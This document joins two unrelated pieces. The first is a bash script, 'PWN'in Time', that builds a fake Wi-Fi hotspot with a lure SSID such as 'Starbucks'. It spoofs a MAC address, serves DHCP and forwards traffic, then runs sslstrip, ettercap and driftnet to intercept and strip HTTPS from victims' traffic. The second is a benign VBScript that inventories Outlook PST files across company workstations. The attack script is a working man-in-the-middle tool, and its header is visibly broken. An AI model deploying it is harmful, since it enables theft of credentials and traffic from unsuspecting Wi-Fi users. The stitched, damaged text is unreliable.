!/bin/bash
#  PWN'in Time
#setup dhcp3
 intro
     echo "Is dhcp3-server already configured [y/n]?"
     read DHCP
     if [ "$DHCP" = "y" ]; then
             echo ""
     elif [ "$DHCP" = "n" ]; then
             echo "[>] Installing [please wait]..."
            apt-get install dhcp3-server -y &>/dev/null
             echo "[>] Installation finished"
             echo "[>] Backing up dchpd.conf to /etc/dhcp3/dhcpd.conf.backup"
             mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
             echo "[>] Seting up configuration file"
             #write to file
             echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}" > /etc/dhcp3/dhcpd.conf    
             echo "[>] Finished dhcp setup"
             read -p "Press [Enter] key to continue..."
     else
             echo "Please select y or n"
     fi
     clear
}

function startap {
     #interface
     clear
     intro
     echo What is your Fake AP interface [ex.wlan2]:
     read FAKEAP
     clear
     #connected interface
     intro   
     echo What is your interface that is connected to the Internet? [ex:wlan0 or Eth0]:
     read REALAP
     clear
     #ssid
     intro
     echo SSID of your fake AP [ex.Starbucks]:
     read SSID
     clear
     #channel
     intro
     echo Channel of your fake AP [1-12]?
     read CHANNEL
     #checking
     clear
     intro
     echo "Confirm Configuration?"
     echo "Fake AP interface: $FAKEAP"
     echo "Connected infterface: $REALAP"
     echo "SSID: $SSID"
     echo "Channel: $CHANNEL"
     echo
     read -p "Press [Enter] key to continue..."
     clear
}

function bypass {
     #interface up
     intro
     echo "[>] Putting interface up"
     ifconfig $FAKEAP down
       #macchanger -r $FAKEAP
     #ifconfig $FAKEAP up
     #monitor mode
     echo "[>] Putting your interface in monitor mode"
     airmon-ng start $FAKEAP &>/dev/null
     ifconfig mon0 down
     echo "[>] Spoofing Mac Address"
     macchanger -r mon0
     ifconfig mon0 up
     #create ap
     echo "[>] Creating new window for creating access point"
     #gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
     echo "[*] Fake AP created"
     sleep 2    
     xterm -e "cd /pentest/web/sslstrip/;./sslstrip.py -a -k -f -l" &
     echo "[*] SSLSTRIP RUNNING"
     sleep 2
     echo "[>] Creating new window for EtterCap"
     #Change to RealAP or FakeAP?     
    xterm -e "ettercap -T -q -p -i at0 // //" &
    xterm -e "driftnet -v -i at0" &
 }

function dhcp {
     echo "[>] Setting up dhcp-server"
     ifconfig at0 up &&
     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
     /etc/init.d/dhcp3-server start &>/dev/null &&
     echo "[>] Setting up /sbin/iptables"
}

function iptables {
     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward

}

function finished {
     echo "[>] Kill EvilAP"
     echo "[>] Turning off monitor mode..."
     airmon-ng stop mon0 &>/dev/null
     echo "[>] Shutting down airbase-ng"
     killall airbase-ng
     echo "[>] Stoping dchp server"
     /etc/init.d/dhcp3-server stop
     echo "[*] Ninja Vanish"
     exit
}

#Executing here
setup
startap
bypass
sleep 2
dhcp
iptables
read -p "Press [Enter] key to quit..."
finished
									

In this example we wanted to find all the pst files on all workstations within the company. I packaged the script within SCCM and pushed the following vbscript out to the masses.

‘ Package History:
‘ Date          Packager             Notes
‘======================================================
‘ 27-02-2012           PST Tracker v.1
‘*************************************************************************************
‘Find all Outlook pst files on C and report them

strComputer = “.”
‘ on error resume next
set wshnetwork=createobject(“wscript.network”)
scomputername=wshnetwork.computername
Set objNetwork = CreateObject(“WScript.Network”)

Const OverwriteExisting = True

Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″)

Set colFiles = objWMIService.ExecQuery _
(“Select * from CIM_DataFile Where Extension = ‘pst’ AND (Drive = ‘C:’)”)
‘OR Drive = ‘D:’)”) Can add other Drive locations if need

If colFiles.Count = 0 Then
Wscript.Quit
End If

Set objFSO = CreateObject(“Scripting.FileSystemObject”)
‘ Change CreateFolder to your location of choice – Example a network drive.
Set objFolder = objFSO.CreateFolder(“C:\PST Finder\pstlog”)
Set objTextFile = objFSO.CreateTextFile(“C:\PST Finder\pstlog\pst_files_on_” & scomputername & objNetwork.UserName & “.txt ” , True)

For Each objFile in colFiles
objTextFile.Write(objFile.Drive & objFile.Path & “”)
objTextFile.Write(objFile.FileName & “.” & objFile.Extension & “, Size “)
objTextFile.Write(objFile.FileSize /1024 & “kb” & vbCrLf)
Next

objTextFile.Close
‘Destroy objects
set wshnetwork=nothing